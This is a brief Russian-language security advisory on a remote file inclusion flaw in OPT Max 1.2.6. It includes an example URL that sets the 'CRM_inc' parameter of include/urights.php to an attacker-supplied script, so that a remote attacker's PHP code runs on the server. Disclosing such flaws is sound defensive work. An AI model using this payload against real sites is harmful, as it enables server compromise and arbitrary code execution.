Программа: OPT Max 1.2.6, возможно другие версии.

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "CRM_inc" в сценарии include/urights.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Пример:

http://victim/[opt_path]/include/urights.php?CRM_inc=[evil_scripts.txt]



Оставить мнение